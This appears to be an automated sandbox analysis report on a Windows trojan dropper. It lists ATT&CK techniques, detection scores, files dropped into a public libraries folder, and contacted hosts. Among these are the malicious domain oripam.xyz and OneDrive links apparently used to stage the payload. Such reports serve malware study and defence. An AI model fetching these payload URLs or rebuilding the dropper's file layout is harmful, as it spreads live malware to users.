Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Valid Accounts	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Access Token Manipulation	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	131 Virtualization/Sandbox Evasion	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	311 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	53%	ReversingLabs	Win32.Trojan.Ulise
SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Libraries\netutils.dll	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Clmgncrs.PIF	100%	Joe Sandbox ML
C:\Users\Public\Libraries\Clmgncrs.PIF	53%	ReversingLabs	Win32.Trojan.Ulise
C:\Users\Public\Libraries\easinvoker.exe	0%	ReversingLabs
C:\Users\Public\Libraries\netutils.dll	71%	ReversingLabs	Win64.Trojan.Generic
C:\Users\Public\Libraries\srcngmlC.pif	3%	ReversingLabs
C:\Users\Public\Libraries\truesight.sys	8%	ReversingLabs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
http://r3.o.lencr.org0	0%	URL Reputation	safe
http://cps.root-x1.letsencrypt.org0	0%	URL Reputation	safe
http://oripam.xyz	100%	Avira URL Cloud	malware
http://mail.oripam.xyz	100%	Avira URL Cloud	malware
http://r3.i.lencr.org/0G	0%	Avira URL Cloud	safe
http://ocsp.sectigo.com0C	0%	Avira URL Cloud	safe
http://www.pmail.com0	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
dual-spov-0006.spov-msedge.net	13.107.139.11	true	false	unknown
oripam.xyz	185.56.136.50	true	true	unknown
api4.ipify.org	173.231.16.75	true	false	high
onedrive.live.com	unknown	unknown	false	high
mail.oripam.xyz	unknown	unknown	true	unknown
api.ipify.org	unknown	unknown	false	high
ypfgrg.sn.files.1drv.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
https://onedrive.live.com/download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0	SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	false	URL Reputation: safe	unknown
https://ypfgrg.sn.files.1drv.com:443/y4msfS_e270PF1WCCn3T5ASjYfsXiOpfH10UgaOZ4PL-nRYDMKHbDGEjKzr8Rs0	Clmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ypfgrg.sn.files.1drv.com/	SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1685153394.0000000000764000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679908372.000000000073E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1682330208.0000000000765000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sectigo.com/CPS0	SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	false	URL Reputation: safe	unknown
https://ypfgrg.sn.files.1drv.com/h	Clmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	false		high
https://account.dyn.com/	srcngmlC.pif, 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp	false		high
https://onedrive.live.com/download?resid=31BDC6BCA3597F9E%21304&authkey=	Clmgncrs.PIF, 00000009.00000002.1906761874.0000000002950000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	false	URL Reputation: safe	unknown
https://ypfgrg.sn.files.1drv.com/y4mbejU0zcnLb8KIWNqfLsU3N_rsqNxx32XcbH8LaSJJsucoEjYDeg2UbWhApyywdOR	SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679908372.000000000073E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#	SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	false	URL Reputation: safe	unknown
https://ypfgrg.sn.files.1drv.com/y4msDhUEASrFMIPv49fXAzT4qs4bguIHP4CCd0btJ0hrPPN2V-ZqBRXsYtcVL3jQXO7	Clmgncrs.PIF, 00000006.00000002.1836211826.00000000007E5000.00000004.00000020.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1836211826.00000000007AF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ypfgrg.sn.files.1drv.com:443/y4mbejU0zcnLb8KIWNqfLsU3N_rsqNxx32XcbH8LaSJJsucoEjYDeg2UbWhApyy	SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1685153394.0000000000741000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679908372.000000000073E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://live.com/G	Clmgncrs.PIF, 00000006.00000003.1833585649.00000000007D5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1679521922.0000000021EB1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1705377961.0000000022059000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, truesight.sys.0.dr	false	URL Reputation: safe	unknown
https://api.ipify.org/t	srcngmlC.pif, 00000005.00000002.1877750905.0000000031F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F11000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DE61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://r3.i.lencr.org/0G	srcngmlC.pif, 00000005.00000002.1876165964.0000000030227000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1941264509.000000003004F000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.000000004131A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/	SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1685153394.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, Clmgncrs.PIF, 00000009.00000002.1904525907.0000000000938000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.ipify.org	srcngmlC.pif, 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F11000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DE61000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ypfgrg.sn.files.1drv.com/D	Clmgncrs.PIF, 00000006.00000003.1833585649.00000000007D5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353A8000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.000000004131A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1881543836.0000000036210000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353A8000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.000000004131A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ypfgrg.sn.files.1drv.com/y4msfS_e270PF1WCCn3T5ASjYfsXiOpfH10UgaOZ4PL-nRYDMKHbDGEjKzr8Rs0CmTq	Clmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmp, Clmgncrs.PIF, 00000009.00000002.1904525907.0000000000997000.00000004.00000020.00020000.00000000.sdmp	false		high
https://live.com/	Clmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://mail.oripam.xyz	srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F7F000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F8F000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEDF000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://oripam.xyz	srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F7F000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F8F000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEDF000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://r3.o.lencr.org0	srcngmlC.pif, 00000005.00000002.1876165964.0000000030227000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032035000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879294408.0000000034500000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1879404870.00000000345E2000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000032064000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1877750905.0000000031F87000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031FFB000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F97000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944641833.00000000353F9000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1944537125.0000000035320000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1941264509.000000003004F000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935931113.0000000041374000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.000000004131A000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2935804453.00000000412E0000.00000004.00000020.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DFC4000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DF4B000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DEE7000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ypfgrg.sn.files.1drv.com/y4m7fJhE-49Pt4dSp9jiqldsLsML_i9iJ0IU-qjBsvNj8FZRj4pBDSp-HX0gkJLIgC5	Clmgncrs.PIF, 00000009.00000002.1904525907.00000000009A6000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	srcngmlC.pif, 00000005.00000002.1877750905.0000000031F01000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000002.1942547850.0000000031F11000.00000004.00000800.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000002.2933322220.000000003DE61000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ypfgrg.sn.files.1drv.com:443/y4msDhUEASrFMIPv49fXAzT4qs4bguIHP4CCd0btJ0hrPPN2V-ZqBRXsYtcVL3j	Clmgncrs.PIF, 00000006.00000003.1833585649.00000000007A4000.00000004.00000020.00020000.00000000.sdmp	false		high
